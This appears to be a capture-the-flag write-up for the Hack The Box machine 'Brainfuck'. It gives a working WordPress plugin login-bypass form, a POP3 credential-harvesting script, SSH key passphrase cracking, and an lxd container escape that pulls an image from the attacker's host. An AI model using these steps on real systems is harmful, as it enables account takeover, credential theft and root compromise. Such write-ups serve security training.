Basic information

Port scan

Ports 22, 25, 110, 143 and 443 are open, and the SSL certificate on 443 leaks the subdomains:

$ nmap -sC -sV 10.10.10.17
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-25 13:56 CST
Nmap scan report for 10.10.10.17
Host is up (0.069s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL USER SASL(PLAIN) TOP CAPA RESP-CODES AUTH-RESP-CODE
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities OK listed LOGIN-REFERRALS SASL-IR AUTH=PLAINA0001 have LITERAL+ post-login Pre-login more IMAP4rev1 ID IDLE ENABLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.99 seconds

443

Visiting the IP directly only shows the nginx default page, so the site is name-based:

So add the names from the certificate to /etc/hosts:

10.10.10.17 sup3rs3cr3t.brainfuck.htb www.brainfuck.htb brainfuck.htb

brainfuck.htb

This is a WordPress site. The front page gives an e-mail address and states that the site sends mail over SMTP; the scan above already showed the mail ports (25, 110, 143) open:

sup3rs3cr3t.brainfuck.htb

sup3rs3cr3t.brainfuck.htb looks like a forum with registration and login; park it for now:

Wordpress

wpscan

Since it is WordPress, run wpscan straight away; it finds an outdated plugin:

wpscan --url https://brainfuck.htb --disable-tls-checks

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

This plugin version has a known, exploitable vulnerability:

login

The plugin's logic flaw lets you log in as any existing WordPress user without a password. The administrator account is of no use here; log in as admin for the following steps:

smtp password

Under Settings -> Easy WP SMTP the SMTP configuration is shown. The password field is masked, but the value is still in the page: change the input type from password to text in the browser devtools (or read the value attribute) to reveal it:

orestis : kHGuERB29DNiNE

ticket.html

<!-- The plugin's loginGuestFacebook AJAX action trusts the submitted username and
     sets the WordPress auth cookie for it without verifying any Facebook login.
     Open this file in a browser, submit, then browse to https://brainfuck.htb/wp-admin/. -->
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
  Username: <input type="text" name="username" value="admin">
  <input type="hidden" name="email" value="sth">
  <input type="hidden" name="action" value="loginGuestFacebook">
  <input type="submit" value="Login">
</form>

Mail (POP3)

enum

The SMTP credentials from the plugin settings are reused against the mail server. Note that it is POP3 on port 110 that hands over the mailbox, not SMTP; Dovecot accepts the same username and password. Two messages come back, and the second one contains the username and password for the secret forum:

$ ncat 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
LIST
+OK 2 messages:
1 977
2 514
.
RETR 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
.
RETR 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.
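The same retrieval automated, as an added example that is not part of the original writeup: a tiny in-process POP3 responder (constructed here to stand in for Dovecot; it speaks only USER, PASS, LIST, RETR and QUIT) serves two messages built from the mails above, and the client side logs in with poplib, lists and fetches everything, and pulls username:/password: lines out of each body. The host, port, the stub and the helper names (harvest_credentials, run_against_stub, auth_rejected) are assumptions so that it runs offline; against the real box you would point harvest_credentials at 10.10.10.17 port 110.

```python
import email
import poplib
import socket
import threading
from email import policy

# Constructed sample mailbox, built from the two messages retrieved above.
MAILBOX = {
    1: "\r\n".join([
        "From: WordPress <wordpress@brainfuck.htb>",
        "To: orestis@brainfuck.htb",
        "Subject: New WordPress Site",
        "",
        "You can log in to the administrator account with the following information:",
        "",
        "Username: admin",
        "Password: The password you chose during the install.",
        "Log in here: https://brainfuck.htb/wp-login.php",
        "",
    ]),
    2: "\r\n".join([
        "From: root@brainfuck.htb (root)",
        "To: orestis@brainfuck.htb",
        "Subject: Forum Access Details",
        "",
        'Hi there, your credentials for our "secret" forum are below :)',
        "",
        "username: orestis",
        "password: kIEnnfEKJ#9UmdO",
        "",
        "Regards",
        "",
    ]),
}


def _fake_pop3_server(listener, good_user, good_pass):
    """Constructed stand-in for Dovecot: answers one client, one command per line."""
    conn, _ = listener.accept()
    f = conn.makefile("rwb")

    def send(line):
        f.write(line.encode() + b"\r\n")
        f.flush()

    send("+OK Dovecot ready.")
    user, authed = None, False
    while True:
        raw = f.readline()
        if not raw:
            break
        cmd, _, arg = raw.decode().rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            send("+OK")
        elif cmd == "PASS":
            authed = (user == good_user and arg == good_pass)
            send("+OK Logged in." if authed else "-ERR [AUTH] Authentication failed.")
        elif cmd == "QUIT":
            send("+OK Logging out.")
            break
        elif not authed:
            send("-ERR Unknown command.")
        elif cmd == "LIST":
            send("+OK %d messages:" % len(MAILBOX))
            for num, body in MAILBOX.items():
                send("%d %d" % (num, len(body)))
            send(".")
        elif cmd == "RETR" and arg.isdigit() and int(arg) in MAILBOX:
            body = MAILBOX[int(arg)]
            send("+OK %d octets" % len(body))
            f.write(body.encode())  # body already ends in CRLF; no '.'-led lines, so no byte-stuffing needed
            send(".")
        else:
            send("-ERR Unknown command.")
    f.close()
    conn.close()


def harvest_credentials(host, port, user, password):
    """USER/PASS, LIST, RETR every message; return [(subject, {"username":..,"password":..}), ...]
    for each message whose body carries username:/password: lines."""
    pop = poplib.POP3(host, port, timeout=5)
    try:
        pop.user(user)
        pop.pass_(password)                      # raises poplib.error_proto on "-ERR"
        _, listing, _ = pop.list()
        found = []
        for entry in listing:                    # entries look like b"1 977"
            num = int(entry.split()[0])
            _, lines, _ = pop.retr(num)
            msg = email.message_from_bytes(b"\r\n".join(lines), policy=policy.default)
            creds = {}
            for line in msg.get_content().splitlines():
                key, sep, value = line.partition(":")
                if sep and key.strip().lower() in ("username", "password"):
                    creds[key.strip().lower()] = value.strip()
            if creds:
                found.append((str(msg["Subject"]), creds))
        return found
    finally:
        pop.quit()


def run_against_stub(user, password):
    """Start the stub on an ephemeral loopback port and run the harvest against it."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    t = threading.Thread(target=_fake_pop3_server,
                         args=(listener, "orestis", "kHGuERB29DNiNE"), daemon=True)
    t.start()
    try:
        return harvest_credentials("127.0.0.1", listener.getsockname()[1], user, password)
    finally:
        t.join(5)
        listener.close()


def auth_rejected(user, password):
    """True when the server answers PASS with -ERR (poplib surfaces that as error_proto)."""
    try:
        run_against_stub(user, password)
        return False
    except poplib.error_proto:
        return True


if __name__ == "__main__":
    for subject, creds in run_against_stub("orestis", "kHGuERB29DNiNE"):
        print(subject, creds)
```

The filter is deliberately loose: the WordPress welcome mail also matches, with a placeholder instead of a real password, so the output still needs a human look. Swapping the stub for the real host is the only change needed on an engagement.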

sup3rs3cr3t.brainfuck.htb

Back to the forum from earlier; log in with the credentials just obtained:

In the "SSH access" thread orestis says his account is locked and asks the admin to send him his key. The "Key" thread is the same conversation, but every post is encrypted:

vigenere

Note orestis's signature, the one-to-one correspondence between the posts of the two threads, and the shape of the URL:

Orestis - Hacking for fun and profit
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr is most likely a URL
mnvze:// -> https://
sp_ptr -> id_rsa

The cipher is Vigenère: the digits and punctuation are untouched and the same plaintext letter maps to different ciphertext letters, which rules out a simple substitution.

Decrypting it gives the download URL of the SSH key:

https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
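How the key is actually recovered, as an added example that is not part of the original writeup: the signature is a known plaintext/ciphertext pair, so the letter-wise difference yields the key stream; its shortest period is the key, up to rotation, because the signature sits mid-post and not at the start of the key cycle. The unknown phase is fixed by trying every rotation until the URL ciphertext decrypts to something starting with https (that crib, and the function names, are my assumptions). The three strings are copied from the page.

```python
import string

ALPHA = string.ascii_lowercase

# Copied from the forum: orestis's signature in clear and in the encrypted thread,
# and the encrypted URL from the "Key" thread.
SIG_PLAIN = "Orestis - Hacking for fun and profit"
SIG_CIPHER = "Qbqquzs - Pnhekxs dpi fca fhf zdmgzt"
URL_CIPHER = "mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr"


def vigenere(text, key, decrypt=False):
    """Classic Vigenere over a-z. Only letters are shifted and only letters advance
    the key; digits and punctuation pass through, which is why '://' and the IP survive."""
    key = key.lower()
    out, i = [], 0
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        k = ALPHA.index(key[i % len(key)])
        c = ALPHA.index(ch.lower())
        s = (c - k) % 26 if decrypt else (c + k) % 26
        out.append(ALPHA[s].upper() if ch.isupper() else ALPHA[s])
        i += 1
    return "".join(out)


def recover_keystream(plain, cipher):
    """Known-plaintext attack: key letter = cipher letter - plain letter (mod 26)."""
    if len(plain) != len(cipher):
        raise ValueError("plaintext and ciphertext differ in length")
    ks = []
    for p, c in zip(plain, cipher):
        if p.isalpha():
            ks.append(ALPHA[(ALPHA.index(c.lower()) - ALPHA.index(p.lower())) % 26])
        elif p != c:
            raise ValueError("non-letter differs: %r vs %r" % (p, c))
    return "".join(ks)


def minimal_period(ks):
    """Shortest prefix of ks that, repeated, regenerates all of ks."""
    for n in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % n] for i in range(len(ks))):
            return ks[:n]
    return ks


def find_phase(cipher, period_key, crib):
    """Try every rotation of the period key; keep the one under which the
    ciphertext decrypts to the expected prefix."""
    for r in range(len(period_key)):
        rotated = period_key[r:] + period_key[:r]
        if vigenere(cipher, rotated, decrypt=True).startswith(crib):
            return rotated
    raise ValueError("no rotation of %r decrypts to %r" % (period_key, crib))


def solve():
    """Return (key, decrypted URL) for the strings above."""
    ks = recover_keystream(SIG_PLAIN, SIG_CIPHER)
    key = find_phase(URL_CIPHER, minimal_period(ks), "https")
    return key, vigenere(URL_CIPHER, key, decrypt=True)


if __name__ == "__main__":
    key, url = solve()
    print("key:", key)
    print("url:", url)
```

Running solve() prints the key and the URL shown on the line above. The phase search matters: the stream recovered from the signature starts two letters into the key, and decrypting the URL with that rotation would give garbage for the scheme and the directory name.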

ssh key

The downloaded key cannot be used as-is: it is passphrase-protected. Convert it with ssh2john and crack the passphrase with john:

wget https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa --no-check-certificate
chmod 600 id_rsa
python /usr/share/john/ssh2john.py id_rsa > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked passphrase: 3poulakia!

user flag

Then ssh in as orestis with the key and passphrase; user.txt is in the home directory:

Privilege escalation

There is more than one way to escalate: the intended path is the cryptography challenge in the home directory, but membership of the lxd group gives an unintended route as well.

lxd

The current user is in the lxd group; the exploitation is shown further down:

orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)

RSA

There are a few more files in the home directory; a quick look shows that root.txt has been RSA-encrypted:

debug.txt

7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

encrypt.sage

nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

output.txt

Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

RSA Decrypt get root flag

Textbook RSA, and debug.txt leaks p, q and e. With the factors known, phi = (p-1)(q-1) is known, d = e^-1 mod phi follows, and m = c^d mod n gives back the flag bytes:

solve.py

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x, y, u, v = 0, 1, 1, 0
    while a != 0:
        q, r = b // a, b % a
        m, n = x - u * q, y - v * q
        b, a, x, y, u, v = a, r, u, v, m, n
    return b, x, y


def main():
    # Values from debug.txt / output.txt
    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

    # n = p*q; since p and q are prime, phi(n) = (p-1)*(q-1)
    n = p * q
    phi = (p - 1) * (q - 1)

    # Private exponent d = e^-1 mod phi. egcd may return a negative x, so reduce
    # it mod phi (on Python 3.8+ pow(e, -1, phi) does the same in one call).
    g, x, _ = egcd(e, phi)
    assert g == 1, "e is not invertible mod phi"
    d = x % phi
    print("d: " + str(d))

    # Decrypt, then re-encrypt as a sanity check before trusting the result
    pt = pow(ct, d, n)
    assert pow(pt, e, n) == ct
    print("pt: " + str(pt))

    # encrypt.sage built m from the hex of the flag text; reverse that
    # (Python 3 has no str.decode('hex'), so go via int.to_bytes)
    flag = pt.to_bytes((pt.bit_length() + 7) // 8, "big")
    print("root.txt: " + flag.decode())


if __name__ == "__main__":
    main()

lxd to root

This is the same technique as on Tabby: import a privileged container that mounts the host filesystem, then read the host's files from inside it:

# build the Alpine image locally
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine

# on the target (image served from the attacker box over HTTP)
wget 10.10.14.4:7777/alpine-v3.12-x86_64-20200710_2021.tar.gz
lxc image import ./alpine-v3.12-x86_64-20200710_2021.tar.gz --alias miao
lxc image list

# if this step fails with "No storage pool found", run "lxd init" first
# and accept the defaults, then retry
lxc init miao miaoaaaa -c security.privileged=true
lxc config device add miaoaaaa mydevice disk source=/ path=/mnt/root recursive=true
lxc start miaoaaaa
lxc exec miaoaaaa /bin/sh
cd /mnt/root/root
